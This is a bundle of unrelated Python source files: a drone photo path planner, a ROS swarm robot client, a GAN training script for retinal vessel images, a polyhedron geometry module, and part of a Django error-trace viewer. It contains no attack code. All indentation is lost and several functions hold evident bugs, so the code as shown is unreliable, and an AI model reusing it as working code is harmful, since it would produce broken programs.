flight_path_x, flight_path_y = poly_line_offset.xy
return flight_path_x, flight_path_y
def calculate_photo_positions(self,path_x, path_y):
new_path_x = []
new_path_y = []
for i in range(len(path_x)-1):
path_length = math.sqrt(((path_x[i]-path_x[i+1])**2)+((path_y[i]-path_y[i+1])**2))
N = math.ceil(path_length/(self.FIELD_OF_VIEW))+1
delta_path_x = np.linspace(path_x[i], path_x[i+1], N) # endpoit false for testing only
delta_path_y = np.linspace(path_y[i], path_y[i+1], N)
new_path_x = np.concatenate((new_path_x, delta_path_x))
new_path_y = np.concatenate((new_path_y, delta_path_y))
return new_path_x, new_path_y
def calculate_photo_orientation(self,path_x, path_y):
angles = []
for i in range(len(path_x)):
#get angle at each point (line seqments)
if(i == len(path_x)-1):
angle = math.atan2(path_y[i]-path_y[i-1], path_x[i]-path_x[i-1]) * 180 / 3.1415
else:
if(path_x[i] == path_x[i+1] and path_y[i] == path_y[i+1]):
angle = math.atan2(path_y[i]-path_y[i-1], path_x[i]-path_x[i-1]) * 180 / 3.1415
else:
angle = math.atan2(path_y[i+1]-path_y[i], path_x[i+1]-path_x[i]) * 180 / 3.1415
#map range from -180;180 to 0;360 deg where 0 deg is along x axis
angle = (angle + 360)%360
angle *= -1
if self.dirrec == "CW":
angle += 180
#calculating caputre orientation perendicular to the fence/drone path:
#if (self.dirrec == "CW"):
# angle += 180
if angle > 360:
angle = angle%360
if(angle < 0):
angle = 360-abs(angle)
angle = round(angle,2)
angles.append(angle)
#print(str(i) + ": " + str(path_x[i]) + " at: " + str(angles[i]))
return angles
def convert_utm_to_lon_lat(self,hemisphere,zone,east,north):
lat = []
lon = []
for x in range(len(north)):
latx,lony = self.uc.utm_to_geodetic(hemisphere,zone,east[x],north[x])
lat.append(latx)
lon.append(lony)
return lat,lon
def collect_xy_oriantation(self,lat_x,lon_y,ori):
N= 3 # params
M = len(ori) #n
data = np.zeros([M,N])#,dtype='float64') #creating a set of data for each point
for x in range(M):
data[x][0] = lat_x[x] # This should be lon or lat?
data[x][1] = lon_y[x] # This should be lon or lat?
data[x][2] = ori[x]
return data
def write_csv(self,data,fileName):
with open( self.basePath + fileName,'w') as file:
writeData = csv.writer(file)#,quoting=csv.QUOTE_ALL)
for x in range(len(data)):
writeData.writerow([data[x][1],data[x][0],data[x][2]])
def fix_start_point(self, path_fence, flight_path_x, flight_path_y):
node = path_fence[0]
#print(path_fence[0])
#print(flight_path_x)
nodes = zip(flight_path_x,flight_path_y)
shift = cdist([node], nodes).argmin()
fixed_x = np.roll(flight_path_x,-shift)
fixed_y = np.roll(flight_path_y,-shift)
return fixed_x, fixed_y
def fix_dir(self, flight_path_x, flight_path_y):
if self.dirrec == "CCW":
x = np.flipud(flight_path_x)
y = np.flipud(flight_path_y)
else:
x = flight_path_x
y = flight_path_y
return x, y
def run_main(self,plan_file):
hemisphere, zone, letter, path_fence = self.get_fence_position(plan_file)
#print(path_fence[0])
flight_path_x, flight_path_y = self.calculate_flight_path(path_fence)
flight_path_x, flight_path_y = self.fix_dir(flight_path_x, flight_path_y)
photo_pos_x, photo_pos_y = self.calculate_photo_positions(flight_path_x, flight_path_y)
photo_pos_x, photo_pos_y = self.fix_start_point(path_fence, photo_pos_x, photo_pos_y)
photo_orientation = self.calculate_photo_orientation(photo_pos_x, photo_pos_y) # roation around z-axis
lat,lon = self.convert_utm_to_lon_lat(hemisphere,zone,photo_pos_x,photo_pos_y)
pos = self.collect_xy_oriantation(lat,lon,photo_orientation)
self.write_csv(pos,self.csv_filename)
#print(len(pos))
## -------- Plotting data ------- ##
if self.plotData is True:
fence_x,fence_y = zip(*path_fence)
plt.plot(fence_x,fence_y,'o-',color='black')
plt.plot(photo_pos_x,photo_pos_y,'o-',color='red')
for i, txt in enumerate(photo_orientation):
plt.annotate(txt, (photo_pos_x[i], photo_pos_y[i]))
plt.axis('equal')
plt.show()
if __name__ == "__main__":
#try:
Pathplanclass()
#except rospy.ROSInterruptException as e:
# print(e)
|
#!/usr/bin/env python
import time
import PyKDL
import tf
import rospy
import roslibpy
from tf_conversions import posemath
from geometry_msgs.msg import Twist, Pose, PoseStamped
from move_base_msgs.msg import MoveBaseGoal, MoveBaseFeedback, MoveBaseAction
class SwarmClient():
def __init__(self):
# base robot ip and port
self.__base_port = rospy.get_param('~base_port', 9090)
self.__base_ip = rospy.get_param('~base_address', 'scout-mini-02.local')
# robot name, each robot should have different name
self.__robot_name = rospy.get_param('~robot_name', 'scout-mini-02')
self.__robot_frame_id = rospy.get_param('~robot_frame_id', 'base_footprint')
self.__load_swarm_trans()
self.__current_command = 'dismiss'
self.__tf_listener = tf.TransformListener()
self.__ros_client = roslibpy.Ros(self.__base_ip, self.__base_port)
self.__joy_command = roslibpy.Topic(self.__ros_client, 'yocs_cmd_vel_mux/input/joy_cmd', 'geometry_msgs/Twist')
self.__swarm_command = roslibpy.Topic(self.__ros_client, 'swarm_command', 'swarm_msgs/SwarmCommand')
self.__swarm_heartbeat = roslibpy.Topic(self.__ros_client, 'swarm_hearbeat', 'swarm_msgs/SwarmHeartbeat')
# self.__move_base_pub = rospy.Publisher('swarm_goal', PoseStamped, queue_size=30)
self.__move_base_pub = rospy.Publisher('move_base_simple/goal', PoseStamped, queue_size=30)
self.__cmd_pub = rospy.Publisher('yocs_cmd_vel_mux/input/navigation_cmd', Twist, queue_size=30)
# self.__cmd_pub = rospy.Publisher('test_cmd', Twist, queue_size=30)
self.__target_pose = PoseStamped()
self.__swarm_base_pose = Pose()
self.__ros_client.on_ready(self.__start_sending, run_in_thread=True)
self.__ros_client.on_ready(self.__start_receiving, run_in_thread=True)
self.__ros_client.run()
rospy.loginfo('Swarm client started')
def target_pose(self):
return self.__target_pose
def swarm_base_pose(self):
return self.__swarm_base_pose
def __load_swarm_trans(self):
type_list = rospy.get_param('swarm_trans')
self.__swarm_trans = {}
for name in type_list:
data = rospy.get_param('swarm_trans/'+name)
self.__swarm_trans[name] = PyKDL.Frame(PyKDL.Rotation.RPY(data[3], data[4], data[5]), PyKDL.Vector(data[0], data[1], data[2]))
rospy.loginfo("get %d swarm type: %s", len(type_list), type_list)
def __joy_callback(self, message):
cmd = Twist()
cmd.linear.x = message['linear']['x']
cmd.linear.y = message['linear']['y']
cmd.linear.z = message['linear']['z']
cmd.angular.x = message['angular']['x']
cmd.angular.y = message['angular']['y']
cmd.angular.z = message['angular']['z']
if self.__current_command == 'joy':
self.__cmd_pub.publish(cmd)
def __command_callback(self, message):
if not self.__swarm_trans.has_key(message['command']):
if message['command'] != 'dismiss' and message['command'] != 'joy':
rospy.logwarn('unknown command type %s', message['command'])
return
self.__current_command = message['command']
self.__swarm_base_pose.position.x = message['pose']['position']['x']
self.__swarm_base_pose.position.y = message['pose']['position']['y']
self.__swarm_base_pose.position.z = message['pose']['position']['z']
self.__swarm_base_pose.orientation.x = message['pose']['orientation']['x']
self.__swarm_base_pose.orientation.y = message['pose']['orientation']['y']
self.__swarm_base_pose.orientation.z = message['pose']['orientation']['z']
self.__swarm_base_pose.orientation.w = message['pose']['orientation']['w']
p = posemath.fromMsg(self.__swarm_base_pose)
self.__target_pose.header.stamp = rospy.Time.now()
self.__target_pose.header.frame_id = 'map'
self.__target_pose.pose = posemath.toMsg(p*self.__swarm_trans[self.__current_command])
# self.__move_base_pub.publish(self.__target_pose)
def __start_sending(self):
rospy.loginfo('start sending')
# send robot hearbeat msg to swarm_base robot
rate = rospy.Rate(2)
while self.__ros_client.is_connected:
try:
(trans, orient) = self.__tf_listener.lookupTransform('map', self.__robot_frame_id, rospy.Time(0))
pose_msg = {}
pose_msg['position'] = {'x':trans[0], 'y':trans[1], 'z':trans[2]}
pose_msg['orientation'] = {'x':orient[0], 'y':orient[1], 'z':orient[2], 'w':orient[3]}
heartbeat_msg = {}
heartbeat_msg['header'] = {}
heartbeat_msg['header']['stamp'] = rospy.Time.now()
heartbeat_msg['header']['frame_id'] = self.__robot_name
heartbeat_msg['state'] = self.__current_command
heartbeat_msg['pose'] = pose_msg
self.__swarm_heartbeat.publish(roslibpy.Message(heartbeat_msg))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
rospy.logwarn('tf 1error, %s' % e)
# rospy.loginfo('Swarm State: command %s', self.__current_command)
rate.sleep()
def __start_receiving(self):
rospy.loginfo('start receiving')
self.__joy_command.subscribe(self.__joy_callback)
self.__swarm_command.subscribe(self.__command_callback)
def run(self):
pass
def close(self):
self.__swarm_command.unsubscribe()
self.__ros_client.call_later(2, self.__ros_client.terminate)
def main():
rospy.init_node('swarm_client')
swarm_client = SwarmClient()
r = rospy.Rate(10)
while not rospy.is_shutdown():
r.sleep()
rospy.loginfo('shutdown....')
swarm_client.close()
rospy.loginfo('ok')
if __name__ == '__main__':
main()
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
import numpy as np
import scipy.misc
from alexnet import *
from matplotlib import pyplot as plt
from skimage import io, transform
from scipy.misc import imread, imresize
from data_processing import DataLoader_vessel as DataLoader
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
L_ad = 1
L_content = 1
L_tv = 0
mode = 'Ours'
BATCH_SIZE = 2
sysstr = "Linux"
Z_DIM = 400
LR = 0.0002
LR_str = '_lr2-4'
dataset = 'OURS'
img_H = 512
save_size = [1, 1]
if not os.path.isdir('result/' + dataset + '/' + mode + '/Lad_' + str(L_ad) + '_Lst_' + str(L_content) + '_Ltv_' + str(
L_tv) + '_uniform'):
os.mkdir('result/' + dataset + '/' + mode + '/Lad_' + str(L_ad) + '_Lst_' + str(L_content) + '_Ltv_' + str(
L_tv) + '_uniform')
SAVE_PATH = ('result/' + dataset + '/' + mode + '/Lad_' + str(L_ad) + '_Lst_' + str(L_content) + '_Ltv_' + str(
L_tv) + '_uniform')
tf_config = tf.ConfigProto()
tf_config.gpu_options.allow_growth = True
def bp(loss_label, a, g, sess):
with g.as_default():
with g.gradient_override_map({'Relu': 'bpRelu'}):
grads = tf.gradients(loss_label, a)[0]
return grads
def lrelu(x, leak=0.2, name='lrelu'):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
def save_images(images, size, path):
"""
Save the samples images
The best size number is
int(max(sqrt(image.shape[0]),sqrt(image.shape[1]))) + 1
example:
The batch_size is 64, then the size is recommended [8, 8]
The batch_size is 32, then the size is recommended [6, 6]
"""
# 图片归一化,主要用于生成器输出是 tanh 形式的归一化
img = images
h, w = img.shape[1], img.shape[2]
# 产生一个大画布,用来保存生成的 batch_size 个图像
merge_img = np.zeros((h * size[0], w * size[1], 3))
# 循环使得画布特定地方值为某一幅图像的值
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
merge_img[j * h:j * h + h, i * w:i * w + w, :] = image
# 保存画布
return scipy.misc.imsave(path, merge_img)
def remove_all_file(path):
if os.path.isdir(path):
for i in os.listdir(path):
path_file = os.path.join(path, i)
os.remove(path_file)
initializer = tf.truncated_normal_initializer(stddev=0.02)
bias_initializer = tf.constant_initializer(0.0)
def discriminator(image, reuse=False):
n = 32
bn = slim.batch_norm
with tf.name_scope("disciminator"):
# original
dis1 = slim.convolution2d(image, n, [4, 4], 2, activation_fn=lrelu,
reuse=reuse, scope='d_conv1', weights_initializer=initializer)
dis2 = slim.convolution2d(dis1, 2 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
reuse=reuse, scope='d_conv2', weights_initializer=initializer)
dis3 = slim.convolution2d(dis2, 4 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
reuse=reuse, scope='d_conv3', weights_initializer=initializer)
dis4 = slim.convolution2d(dis3, 8 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
reuse=reuse, scope='d_conv4', weights_initializer=initializer)
dis5 = slim.convolution2d(dis4, 16 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
reuse=reuse, scope='d_conv5', weights_initializer=initializer)
dis6 = slim.convolution2d(dis5, 16 * n, [4, 4], 2, normalizer_fn=bn, activation_fn=lrelu,
reuse=reuse, scope='d_conv6', weights_initializer=initializer)
d_out_logits = slim.fully_connected(slim.flatten(dis6), 1, activation_fn=None, reuse=reuse, scope='d_out',
weights_initializer=initializer)
d_out = tf.nn.sigmoid(d_out_logits)
return d_out, d_out_logits
def generator(image, z, n=64, is_train=True):
with tf.name_scope("generator"):
# original
e1 = slim.conv2d(image, n, [4, 4], 2, activation_fn=lrelu, scope='g_e1_conv',
weights_initializer=initializer)
# 256
e2 = slim.conv2d(lrelu(e1), 2 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
scope='g_e2_conv',
weights_initializer=initializer)
# 128
e3 = slim.conv2d(lrelu(e2), 4 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
scope='g_e3_conv',
weights_initializer=initializer)
# 64
e4 = slim.conv2d(lrelu(e3), 8 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
scope='g_e4_conv',
weights_initializer=initializer)
# 32
e5 = slim.conv2d(lrelu(e4), 8 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
scope='g_e5_conv',
weights_initializer=initializer)
# # 16
e6 = slim.conv2d(lrelu(e5), 8 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
scope='g_e6_conv',
weights_initializer=initializer)
zP = slim.fully_connected(z, 8 * 8 * n, normalizer_fn=None, activation_fn=lrelu, scope='g_project',
weights_initializer=initializer)
zCon = tf.reshape(zP, [-1, 8, 8, n])
# gen1 = slim.conv2d_transpose(lrelu(zCon), 2 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
# scope='g_dconv1', weights_initializer=initializer)
# 8
gen1 = tf.concat([zCon, e6], 3)
gen2 = slim.conv2d_transpose(lrelu(gen1), 8 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
scope='g_dconv2', weights_initializer=initializer)
# 16
gen2 = tf.concat([gen2, e5], 3)
gen3 = slim.conv2d_transpose(lrelu(gen2), 4 * n, [4, 4], 2, normalizer_fn=slim.batch_norm, activation_fn=None,
scope='g_dconv3', weights_initializer=initializer)
gen3 = tf.concat([gen3, e4], 3)
# 32
gen6 = slim.conv2d_transpose(tf.nn.relu(gen3), 2 * n, [4, 4], 2, normalizer_fn=slim.batch_norm,
activation_fn=None,
scope='g_dconv6', weights_initializer=initializer)
gen6 = tf.concat([gen6, e3], 3)
# 64
gen7 = slim.conv2d_transpose(tf.nn.relu(gen6), n, [4, 4], 2, normalizer_fn=slim.batch_norm,
activation_fn=None,
scope='g_dconv7', weights_initializer=initializer)
gen7 = tf.concat([gen7, e2], 3)
gen8 = slim.conv2d_transpose(tf.nn.relu(gen7), n, [4, 4], 2, normalizer_fn=slim.batch_norm,
activation_fn=None,
scope='g_dconv8', weights_initializer=initializer)
gen8 = tf.concat([gen8, e1], 3)
# 128
gen_out = slim.conv2d_transpose(tf.nn.relu(gen8), 3, [4, 4], 2, activation_fn=tf.nn.sigmoid,
scope='g_out', weights_initializer=initializer)
gen_out_227 = tf.image.resize_images(gen_out, [227, 227])
return gen_out, gen_out_227
def styleloss_RNFLD(syn, style_gram, weight_gram, sess):
"""
:param syn: tf N,227,227,3
:param style_gram: ndarray N,6*6,256
:param weight_gram: ndarray N,6*6,256
:param sess:
:return:
"""
net_syn = AlexNet(syn, num_classes=2, is_training=False)
with slim.arg_scope(AlexNet.alexnet_v2_arg_scope()):
tf.get_variable_scope().reuse_variables()
k_syn = net_syn.alexnet_v3()
cnn_output_syn = k_syn[7]
variables = tf.contrib.framework.get_variables_to_restore()[71:85]
saver_syn = tf.train.Saver(variables)
model_file1 = tf.train.latest_checkpoint('./ckpt3/')
saver_syn.restore(sess, model_file1)
cnn_output_syn = tf.reshape(cnn_output_syn, shape=[-1, cnn_output_syn._shape_as_list()[1]
* cnn_output_syn._shape_as_list()[2],
cnn_output_syn._shape_as_list()[3]]) # N,6*6,256
syn_gram = tf.multiply(weight_gram, cnn_output_syn)
style_loss = tf.reduce_mean(tf.square(syn_gram - style_gram))
return style_loss
def get_tv_loss(img):
x = tf.reduce_mean(tf.abs(img[:, 1:, :, :] - img[:, :-1, :, :]))
y = tf.reduce_mean(tf.abs(img[:, :, 1:, :] - img[:, :, :-1, :]))
return x + y
def main():
sess = tf.InteractiveSession()
global_step = tf.Variable(0, name='global_step', trainable=False)
images = tf.placeholder(tf.float32, [BATCH_SIZE, img_H, img_H, 3], name='real_images')
z = tf.placeholder(tf.float32, [BATCH_SIZE, Z_DIM], name='z')
vessel = tf.placeholder(tf.float32, [BATCH_SIZE, img_H, img_H, 3], name='vessel')
style_gram = tf.placeholder(tf.float32, [BATCH_SIZE, None, None], name='style_gram')
weight_gram = tf.placeholder(tf.float32, [BATCH_SIZE, None, None], name='weight_gram')
X = tf.placeholder(tf.float32, [None, 227, 227, 3]) # 输入: MNIST数据图像为展开的向量
G, G_227 = generator(vessel, z)
images_ = tf.concat([images, vessel], 3)
G_ = tf.concat([G, vessel], 3)
D, D_logits = discriminator(images_)
D_, D_logits_ = discriminator(G_, reuse=True)
sess.run(tf.global_variables_initializer())
net = AlexNet(X, num_classes=2, is_training=False)
with slim.arg_scope(AlexNet.alexnet_v2_arg_scope()):
k = net.alexnet_v3()
logits = k[11]
norm_grads = tf.gradients(logits[:, 1], k[7])[0] # 55,55,64
variables = tf.contrib.framework.get_variables_to_restore()[71:85]
saver_syn = tf.train.Saver(variables)
model_file1 = tf.train.latest_checkpoint('./ckpt3/')
saver_syn.restore(sess, model_file1)
"---------------------------------------------------------------"
d_loss_real = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logits, labels=tf.ones_like(D)))
d_loss_fake = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logits_, labels=tf.zeros_like(D_)))
d_loss = d_loss_real + d_loss_fake
g_loss_style = styleloss_RNFLD(G_227, style_gram, weight_gram, sess=sess)
g_loss_ad = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logits_, labels=tf.ones_like(D_)))
g_loss_tv = get_tv_loss(G)
g_loss = L_ad * g_loss_ad + L_content * g_loss_style + L_tv * g_loss_tv
t_vars = tf.trainable_variables()
d_vars = [var for var in t_vars if 'd_' in var.name]
g_vars = [var for var in t_vars if 'g_' in var.name]
saver2 = tf.train.Saver(max_to_keep=10)
d_optim = tf.train.GradientDescentOptimizer(LR).minimize(d_loss, var_list=d_vars, global_step=global_step)
g_optim = tf.train.GradientDescentOptimizer(LR).minimize(g_loss, var_list=g_vars, global_step=global_step)
dataloader = DataLoader(batch_size=BATCH_SIZE, input_size=np.array([img_H, img_H]), sysstr=sysstr, path=dataset)
dataloader_test = DataLoader(batch_size=BATCH_SIZE, input_size=np.array([img_H, img_H]), sysstr=sysstr,
path=dataset)
num_batches = dataloader.num_batches
sample_z = np.random.uniform(0, 1, size=(BATCH_SIZE, Z_DIM))
_, batch_vessel_test, _ = dataloader_test.get_batch()
count = 0
for epoch in range(2400):
for idx in range(num_batches):
batch_images, batch_vessel, img_name = dataloader.get_batch()
batch_z = np.random.uniform(0, 1, size=(BATCH_SIZE, Z_DIM))
batch_images_227 = transform.resize(batch_images, [BATCH_SIZE, 227, 227]) # N,227,227,3
cnn_out, norm_grads_1 = sess.run([k[7], norm_grads], feed_dict={X: batch_images_227})
weights = np.mean(np.abs(norm_grads_1), axis=(1, 2)) # N,256
weight_gram_temp = np.expand_dims(weights, axis=1) # N,1,256
weight_gram_temp1 = np.repeat(weight_gram_temp, 6 * 6, axis=1) # N,6*6,256
Style_gram = np.reshape(cnn_out, [-1, cnn_out.shape[1] * cnn_out.shape[2], cnn_out.shape[3]]) # N,6*6,256
style_gram1 = np.multiply(weight_gram_temp1, Style_gram)
feed_dict_g = {images: batch_images, z: batch_z, vessel: batch_vessel, weight_gram: weight_gram_temp1,
style_gram: style_gram1}
_ = sess.run(d_optim, feed_dict={images: batch_images, z: batch_z, vessel: batch_vessel})
_ = sess.run(g_optim, feed_dict=feed_dict_g)
_ = sess.run(g_optim, feed_dict=feed_dict_g)
errD_fake = d_loss_fake.eval({z: batch_z, vessel: batch_vessel})
errD_real = d_loss_real.eval({images: batch_images, vessel: batch_vessel})
errG = g_loss.eval(feed_dict_g)
count = count + 1
if __name__ == '__main__':
# remove_all_file(SAVE_PATH)
main()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: <NAME>
"""
from . import transformation as trans
import numpy as np
import vg
import itertools as it
from scipy.spatial import ConvexHull
class ConvexPolyhedron(object):
""" Root class for convex polyhedra.
"""
def __init__(self, center=np.array([0, 0, 0]), n_vertex=None, n_edge=None):
self.center = center
self.n_vertex = n_vertex
self.n_edge = n_edge
@property
def n_face(self):
""" Number of faces (calculated with Euler's formula).
"""
try:
n_face = self.n_vertex + self.n_edge - 2
return n_face
except:
return None
@property
def is_proper_shape(self):
""" Check if the shape is proper.
"""
try:
if (self.n_vertex > 0) and (self.n_edge > 0) and (self.n_face > 0):
return True
except:
return False
def is_corner_sharing(ph1, ph2, **kwargs):
""" Determine if two polyhedra are sharing a corner.
"""
is_sharing = []
if ph1.n_vertex >= ph2.n_vertex:
for v in ph2.vertices:
is_sharing.append(np.allclose(ph1.vertices, v, **kwargs))
else:
for v in ph1.vertices:
is_sharing.append(np.allclose(ph2.vertices, v, **kwargs))
nclose = np.sum(is_sharing)
if nclose == 1:
return True # It's counted as corner sharing iff one vertex is common
else:
return False
class Face(object):
""" Coplanar polygon data structure featuring an ordered vertex list.
"""
def __init__(self, vertices, order='cw'):
self.vertices = vertices
self.n_vertex = len(vertices)
if self.n_vertex < 3:
raise ValueError('Number of vertices should be more than 3!')
else:
# Calculate basic properties of the polygon
self.calculate_center()
self.vertex_order(order=order)
self.calculate_edges()
self.calculate_normal()
def vertex_order(self, order='cw'):
""" Vertex list ordering ('cw' as clockwise or 'ccw' as counterclockwise).
"""
# For coplanar polygon the point
keys = list(range(1, self.n_vertex+1))
self.verts_dict = dict(zip(keys, self.vertices))
def calculate_center(self):
""" Calculate the center coordinate of the face polygon.
"""
self.center = self.vertices.mean(axis=0)
def calculate_normal(self):
""" Calculate the unit normal vector of the face in 3D.
"""
normal = np.cross(self.edges[1], self.edges[2])
self.unit_normal = normal / np.linalg.norm(normal)
def calculate_edges(self):
""" Calculate the edge properties of vertices.
"""
self.edges = np.diff(self.vertices, axis=0, append=self.vertices[:1])
self.edgelengths = np.linalg.norm(self.edges, axis=1)
def calculate_area(self):
""" Area of the face in 3D (polygon area).
"""
total = np.array([0, 0, 0])
for i in range(self.n_vertex):
vi1 = self.vertices[i]
if i == self.n_vertex-1:
vi2 = self.vertices[0]
else:
vi2 = self.vertices[i+1]
prod = np.cross(vi1, vi2)
total += prod
self.area = abs(np.dot(total, self.unit_normal) / 2)
class Ordering(object):
""" Class for ordering of a point set.
"""
def __init__(self, *n):
self.n = n
self.n_parts = len(n)
self.indices = [list(range(ni)) for ni in n]
def cartesian_product_ordering(self):
""" Calculate the Cartesian product ordering of the set.
"""
ordered_indices = it.product(*[self.indices*self.n])
return list(ordered_indices)
def cwr_ordering(self):
""" Calculate the set ordering by combination with replacement (CWR).
"""
if self.n_parts == 1:
ordered_indices = it.combinations_with_replacement(self.indices, self.n)
return list(ordered_indices)
def permute(self, shift, keep=True):
""" Permute the indices.
"""
rolled = np.roll(self.indices, shift=shift)
if keep:
self.indices = rolled.tolist()
class DoubletOrdering(Ordering):
""" Class for ordering of two things.
"""
def __init__(self, type='cwr'):
super().__init__(2)
if type == 'cartesian':
self.ordered_indices = self.cartesian_product_ordering()
elif type == 'cwr':
self.ordered_indices = self.cwr_ordering()
class TripletOrdering(Ordering):
""" Class for ordering of three things.
"""
def __init__(self, type='cwr'):
super().__init__(3)
if type == 'cartesian':
self.ordered_indices = self.cartesian_product_ordering()
elif type == 'cwr':
self.ordered_indices = self.cwr_ordering()
class Octahedron(ConvexPolyhedron):
""" Octahedral object with coordinate transformation of its vertices and faces.
"""
def __init__(self, n_vertex=6, n_edge=12, vertices=None, **kwargs):
if vertices is None:
center = kwargs.pop('center', np.array([0, 0, 0]))
else:
center = np.mean(vertices, axis=0)
super().__init__(center=center, n_vertex=n_vertex, n_edge=n_edge)
self.vertices = vertices
@property
def convex_hull(self):
""" Convex hull of the vertices.
"""
try:
return ConvexHull(self.vertices)
except:
return None
@property
def volume(self):
""" Volume of the octahedron.
"""
try:
return self.convex_hull.volume
except:
return None
def generate_vertices(self, radius, poly_type='regular', angles=None, alpha=0, beta=0, gamma=0):
""" Generate the vertex coordinates of the octahedron.
"""
self.poly_type = poly_type
# Generate the coordinates of vertices
if self.poly_type == 'regular': # regular octahedron
a = radius
self.vertices = np.array([[a, 0, 0], [-a, 0, 0],
[0, a, 0], [0, -a, 0],
[0, 0, a], [0, 0, -a]])
elif self.poly_type == 'rhom_bipyramid': # rhombic bipyramid
a, b, c = radius
self.vertices = np.array([[a, 0, 0], [-a, 0, 0],
[0, b, 0], [0, -b, 0],
[0, 0, c], [0, 0, -c]])
elif self.poly_type == 'asym_bipyramid': # asymmetric bipyramid
self.vertices = np.array([[radius[0], 0, 0], [radius[1], 0, 0],
[0, radius[2], 0], [0, radius[3], 0],
[0, 0, radius[4]], [0, 0, radius[5]]])
# Rotate according to the pose angles
if angles is not None:
alpha, beta, gamma = angles
ctr = self.center
transform_list = [trans.translation3D(*ctr), trans.rotzh(gamma),
trans.rotyh(beta), trans.rotxh(alpha),
trans.translation3D(*-ctr)]
transform_matrix = np.matmul(*transform_list)
self.vertices = np.dot(transform_matrix, self.vertices)
# Create vertex list
keys = range(1, len(self.n_vertex)+1)
self.verts_dict = dict(keys, self.vertices)
@property
def apical_vector(self):
""" Apical vector of the octahedron.
self.vertices[0] is the vertex on the far side,
self.vertices[-1] is the vertex on the near side.
"""
return self.vertices[0] - self.vertices[-1]
def vector_orientation(self, vector, refs=None):
""" Orientation angles of a vector.
"""
if refs is None:
xvec = np.array([1, 0, 0])
yvec = np.array([0, 1, 0])
zvec = np.array([0, 0, 1])
refs = [xvec, yvec, zvec]
angles = [vg.angle(vector, ref) for ref in refs]
return angles
|
#
# Copyright (c) 2019 ISP RAS (http://www.ispras.ru)
# Ivannikov Institute for System Programming of the Russian Academy of Sciences
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from reports.source import SourceLine
class GetETV:
tab_length = 4
global_thread = 'global'
condition_class = 'SrcHlAssume'
THREAD_COLORS = [
'#5f54cb', '#85ff47', '#69c8ff', '#ff5de5', '#dfa720',
'#0b67bf', '#fa92ff', '#57bfa8', '#bf425a', '#7d909e'
]
def __init__(self, error_trace, user):
self.user = user
self.trace = json.loads(error_trace)
self._max_line_len = 0
self._curr_scope = 0
self.shown_scopes = set()
self.assumptions = {}
self._scope_assumptions = {}
self._threads = self.__get_threads()
self.globals = self.__get_global_vars()
self.html_trace = self.__parse_node(self.trace['trace'])
def __get_threads(self):
threads = []
if self.trace.get('global variable declarations'):
threads.append(self.global_thread)
threads.extend(self.__get_child_threads(self.trace['trace']))
return threads
def __get_child_threads(self, node_obj):
threads = []
if node_obj.get('line'):
self._max_line_len = max(self._max_line_len, len(str(node_obj['line'])))
if node_obj['type'] == 'thread':
assert node_obj['thread'] != self.global_thread
threads.append(node_obj['thread'])
if 'children' in node_obj:
for child in node_obj['children']:
for thread_id in self.__get_child_threads(child):
if thread_id not in threads:
threads.append(thread_id)
return threads
def __get_global_vars(self):
if 'global variable declarations' not in self.trace:
return None
global_data = {
'thread': self._html_thread['global'],
'line': self.__get_line(),
'offset': ' ',
'source': _('Global variable declarations'),
'lines': []
}
assert isinstance(self.trace['global variable declarations'], list), 'Not a list'
for node in self.trace['global variable declarations']:
global_data['lines'].append({
'thread': self._html_thread['global'],
'line': self.__get_line(node['line']),
'file': self.trace['files'][node['file']],
'offset': ' ',
'source': self.__parse_source(node),
'note': node.get('note'),
'display': node.get('display')
})
return global_data
@property
def _new_scope(self):
self._curr_scope += 1
return self._curr_scope
def __parse_node(self, node, depth=0, thread=None, has_asc_note=False, scope=0):
# Statement
if node['type'] == 'statement':
node_data = self.__parse_statement(node, depth, thread, scope)
if node_data.get('warn'):
# If statement has warn, show current scope
self.shown_scopes.add(scope)
elif node_data.get('note') and not has_asc_note:
# If statement has note and there are no notes in ascendants then show current scope
self.shown_scopes.add(scope)
return [node_data]
# Thread
if node['type'] == 'thread':
thread_scope = self._new_scope
# Always show functions of each thread root scope
self.shown_scopes.add(thread_scope)
children_trace = []
for child_node in node['children']:
children_trace.extend(self.__parse_node(
child_node, depth=0, thread=node['thread'], has_asc_note=False, scope=thread_scope
))
return children_trace
# Function call
if node['type'] == 'function call':
enter_data = self.__parse_function(node, depth, thread, scope)
if enter_data.get('warn') or enter_data.get('note') and not has_asc_note:
self.shown_scopes.add(scope)
return self.__parse_body(enter_data, node, depth, thread, has_asc_note, scope)
# Action
if node['type'] == 'action':
enter_data = self.__parse_action(node, depth, thread, scope)
if enter_data['relevant']:
# Show all relevant actions
self.shown_scopes.add(scope)
return self.__parse_body(enter_data, node, depth, thread, has_asc_note, scope)
def __parse_body(self, enter_data, node, depth, thread, has_asc_note, scope):
new_scope = self._new_scope
